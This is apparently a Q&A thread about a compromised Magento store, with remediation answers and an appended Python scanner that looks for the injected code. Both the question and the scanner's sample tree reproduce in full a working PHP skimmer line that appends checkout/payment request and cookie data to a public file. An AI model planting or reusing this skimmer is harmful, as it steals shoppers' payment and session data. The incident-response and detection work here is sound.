5

Since this morning I'm getting the following PHP Notice after running the Magento cronjob:

```
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
```

I did not modify any of the mage files. How is this possible?

EDIT: For now I've edited the Autoload.php to first check if the REQUEST_URI is set.

Original:

```php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
```

New:

```php
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
```

EDIT 30-04-2015:

After reading the comments from @volkan and @b.enoit.be I immediately replaced the specified page with the original one from Magento, and the line was indeed not present!

The following was the malicious line present in Autoload.php:

```php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
```

I've also checked:

  • /js/index.php same as original
  • /index.php same as original
  • Magpleasure_Filesystem module was not present

However, there were two new admin users which had obscure names:

  • backup - auto_bc@magent.com <-- this domain leads to a domain holding page and the email gives Russian results on Google
  • database - db@local.host

Both users have been deleted. The website was also vulnerable to the shoplift exploit (which is addressed in the latest security patch).

We're currently busy installing the latest security patches.

It seems that this has been a recent problem:

  • 100,000 web shops open to compromise as attackers exploit Magento bug
  • Magento Shoplift Bug Tester v1.0

Thanks to all users for their help.

StavroX
  • You didn't make a change in the way you trigger the cronjob? Could PHP have been updated? No changes in the php.ini file? – adrien54 Apr 29 '15 at 09:35
  • Nope, neither. The server is running PHP (5.5.23-1) – StavroX Apr 29 '15 at 10:00
  • Then I don't know why the error didn't occur before, but the reason is probably that you are running your PHP script (cron.php) from the command line and not the browser, so this server variable is never defined. – adrien54 Apr 29 '15 at 10:09
  • That's what I've been trying to wrap my head around, it worked before and now all of a sudden it gives Undefined index. The cronjob is defined as: `*/5 * * * * php /var/www/website.com/cron.php` – StavroX Apr 29 '15 at 10:14
  • There is no such thing as `$_SERVER["REQUEST_URI"]` in lib/Varien/Autoload.php, though... maybe you did install some crappy module? – β.εηοιτ.βε Apr 29 '15 at 21:03
  • I am also seeing an admin user with `auto_bc@magent.com` -- I'm not familiar with it, but a PM suggests it might be related to a Siteground backup module, are you using Siteground? – pspahn May 29 '15 at 18:47

2 Answers

1

It looks like your page has been compromised. Replace the file with the original one and install the security patches for Magento. Check whether there are any new admin users in the backend, and for the module Magpleasure_Filesystem.

Also check /js/index.php and /index.php.

volkan
0

This is definitely a compromised file.

If anybody else encounters the same problem, media/catalog/product/cache_catalogs file should be deleted as well, because it contains sensitive data (requests and cookies data from checkout or payment pages) and it is publicly accessible (in media/ folder).

SeL
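
A triage check for the indicators found in this thread, as an added example that is not part of the original posts or of Magento: it flags PHP lines that both read request/cookie input and write a file, and non-image files under `media/catalog/product`. The function names, regexes, extension allow-list and sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristic from the injected line quoted in the question (assumption, not a full signature set).
READS_INPUT = re.compile(r"\$_(REQUEST|COOKIE|POST)\b")
WRITES_FILE = re.compile(r"\b(file_put_contents|fwrite|fputs)\s*\(")
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # expected in the product image directory

def scan_magento_root(root):
    """Return sorted (kind, relative_path, line_no) findings under a Magento root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if rel.startswith("media/catalog/product/") and ext not in IMAGE_EXT:
                findings.append(("unexpected-media-file", rel, 0))
            if ext not in {".php", ".phtml"}:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    if READS_INPUT.search(line) and WRITES_FILE.search(line):
                        findings.append(("input-written-to-file", rel, no))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: a file carrying the injected line, a clean file, a dump file, an image."""
    injected = ('<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))'
                '{@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", '
                '@base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>\n')
    samples = {
        "lib/Varien/Autoload.php": injected + "<?php\nclass Varien_Autoload {}\n",
        "index.php": "<?php\nMage::run($mageRunCode, $mageRunType);\n",
        "media/catalog/product/cache_catalogs": "Y29uc3RydWN0ZWQ=:",
        "media/catalog/product/a/b/shirt.jpg": "constructed placeholder",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in scan_magento_root(tmp):
            print(finding)
```

A hit is a prompt to diff the file against a clean copy of the same Magento release, not proof of compromise; legitimate modules can also write request data to disk.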